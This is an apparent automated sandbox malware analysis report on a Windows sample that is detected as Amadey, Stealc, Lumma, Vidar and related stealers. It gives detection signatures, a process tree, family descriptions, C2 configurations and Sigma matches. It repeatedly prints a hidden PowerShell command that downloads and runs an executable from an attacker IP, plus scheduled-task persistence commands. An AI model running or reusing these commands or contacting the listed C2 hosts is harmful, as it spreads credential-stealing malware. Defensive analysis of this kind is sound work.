
Windows Analysis Report
aV2ffcSuKl.exe

Overview

General Information

Sample name: aV2ffcSuKl.exe (renamed because the original name is a hash value)
Original sample name: 29dbe0a1208dfedac751f580a83fca87.exe
Analysis ID: 1630726
MD5: 29dbe0a1208dfedac751f580a83fca87
SHA1: 5dba16b31a81c541525a169fd76426e7ae9a04fd
SHA256: bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9
Tags: exe, user-abuse_ch

Detection

Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, SystemBC, Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected GCleaner
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected Stealc
Yara detected SystemBC
Yara detected Vidar stealer
Yara detected obfuscated html page
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Creates HTA files
Creates HTML files with .exe extension (expired dropper behavior)
Creates multiple autostart registry keys
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Monitors registry run keys for changes
PE file contains section with special chars
Powershell drops PE file
Sample uses string decryption to hide its real strings
Send many emails (e-Mail Spam)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Connects to many different domains
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve many domain names, but no domain seems valid
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • aV2ffcSuKl.exe (PID: 7952 cmdline: "C:\Users\user\Desktop\aV2ffcSuKl.exe" MD5: 29DBE0A1208DFEDAC751F580A83FCA87)
    • cmd.exe (PID: 8000 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8076 cmdline: schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • mshta.exe (PID: 8020 cmdline: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 8132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE (PID: 2668 cmdline: "C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE" MD5: 00C6B612E1A33CCE7BE3A28B82492A84)
          • rapes.exe (PID: 3308 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: 00C6B612E1A33CCE7BE3A28B82492A84)
  • mshta.exe (PID: 6172 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 7096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rapes.exe (PID: 8120 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 00C6B612E1A33CCE7BE3A28B82492A84)
  • rapes.exe (PID: 2188 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 00C6B612E1A33CCE7BE3A28B82492A84)
    • nhDLtPT.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe" MD5: A9749EE52EEFB0FD48A66527095354BB)
      • Gxtuum.exe (PID: 784 cmdline: "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe" MD5: A9749EE52EEFB0FD48A66527095354BB)
    • ILqcVeT.exe (PID: 4156 cmdline: "C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe" MD5: F0AD59C5E3EB8DA5CBBF9C731371941C)
      • chrome.exe (PID: 7972 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
        • chrome.exe (PID: 876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2156,i,114299149771300209,1457107996023773148,262144 /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • msedge.exe (PID: 5204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 2032 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2228,i,8936571210459543028,10198378582791773127,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • rXOl0pp.exe (PID: 8104 cmdline: "C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe" MD5: F0AD59C5E3EB8DA5CBBF9C731371941C)
    • 132fd7f0ed.exe (PID: 2704 cmdline: "C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe" MD5: CB7D258E67E7C7B732E4E03C40355FF0)
      • cmd.exe (PID: 5484 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 5532 cmdline: schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • mshta.exe (PID: 6608 cmdline: mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 7196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6556 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10111060121\am_no.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5160 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • cmd.exe (PID: 7008 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 4772 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 5656 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 6296 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7216 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 5528 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • schtasks.exe (PID: 4632 cmdline: schtasks /create /tn "U6NDLmaxnYP" /tr "mshta \"C:\Temp\plDCQRtK9.hta\"" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • mshta.exe (PID: 6124 cmdline: mshta "C:\Temp\plDCQRtK9.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 7836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 7dbaa342f5.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe" MD5: 473C98DE49CD906F1DB4F35F75AF2DB6)
  • Gxtuum.exe (PID: 7800 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)
    • vertualiziren.exe (PID: 8076 cmdline: "C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe" MD5: 1DC908064451D5D79018241CEA28BC2F)
  • svchost.exe (PID: 7092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • benskvi.exe (PID: 3108 cmdline: C:\ProgramData\jnxnee\benskvi.exe MD5: 1DC908064451D5D79018241CEA28BC2F)
  • mshta.exe (PID: 7572 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 3572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msedge.exe (PID: 3128 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6948 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2136,i,8097992319961427004,17557995905178344852,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • mshta.exe (PID: 5212 cmdline: C:\Windows\system32\mshta.EXE "C:\Temp\plDCQRtK9.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • 132fd7f0ed.exe (PID: 3668 cmdline: "C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe" MD5: CB7D258E67E7C7B732E4E03C40355FF0)
    • cmd.exe (PID: 5272 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6948 cmdline: schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • mshta.exe (PID: 5784 cmdline: mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 6060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malware family descriptions (Name / Description / Attribution / Blogpost URLs / Link):

Amadey
  Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
  Attribution: No Attribution
  Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

GCleaner
  Attribution: No Attribution
  Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner

Stealc
  Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
  Attribution: No Attribution
  Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

SystemBC
  Description: SystemBC is a multiplatform proxy malware active since August 2019. It creates SOCKS5 network tunnels in the victim's network and connects to its C2 server using a custom, RC4-encrypted protocol. It can also download and execute additional malware, with payloads either written to disk or mapped into memory. The SystemBC kit, including the C2 panel, server, and malware executables, is sold in underground forums.
  Attribution: No Attribution
  Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc

Vidar
  Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
  Attribution: No Attribution
  Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Extracted malware configurations:
{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
{"C2 addresses": ["185.156.73.73", "45.91.200.135"]}
{"HOST1": "towerbingobongoboom.com", "HOST2": "62.60.226.86"}
Yara matches, PCAP (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Yara matches, dropped files (Source | Rule | Description | Author):
C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security
C:\Temp\plDCQRtK9.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security
C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security
(4 further entries not shown)

Yara matches, memory dumps (Source | Rule | Description | Author):
0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
00000010.00000003.1782574386.0000000005060000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
0000000C.00000003.1399696987.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
00000019.00000003.2063180045.00000000053A0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000017.00000002.2385311293.0000000000F81000.00000040.00000001.01000000.00000013.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
(47 further entries not shown)

Yara matches, unpacked PE files (Source | Rule | Description | Author):
62.2.7dbaa342f5.exe.dd00000.6.raw.unpack | JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security
62.2.7dbaa342f5.exe.da70000.3.raw.unpack | JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security
62.2.7dbaa342f5.exe.da18000.2.raw.unpack | JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security
21.0.Gxtuum.exe.cb0000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
22.0.Gxtuum.exe.cb0000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
(5 further entries not shown)

Yara matches, AMSI script buffers (Source | Rule | Description | Author):
amsi32_8132.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_7096.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7196.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_3572.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7836.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
(1 further entry not shown)

System Summary

Sigma rule matches (Source; Author; Data):

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\aV2ffcSuKl.exe", ParentImage: C:\Users\user\Desktop\aV2ffcSuKl.exe, ParentProcessId: 7952, ParentProcessName: aV2ffcSuKl.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 8000, ProcessName: cmd.exe

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\aV2ffcSuKl.exe", ParentImage: C:\Users\user\Desktop\aV2ffcSuKl.exe, ParentProcessId: 7952, ParentProcessName: aV2ffcSuKl.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 8000, ProcessName: cmd.exe

Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 2188, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\132fd7f0ed.exe

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe

Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\aV2ffcSuKl.exe", ParentImage: C:\Users\user\Desktop\aV2ffcSuKl.exe, ParentProcessId: 7952, ParentProcessName: aV2ffcSuKl.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ProcessId: 8020, ProcessName: mshta.exe

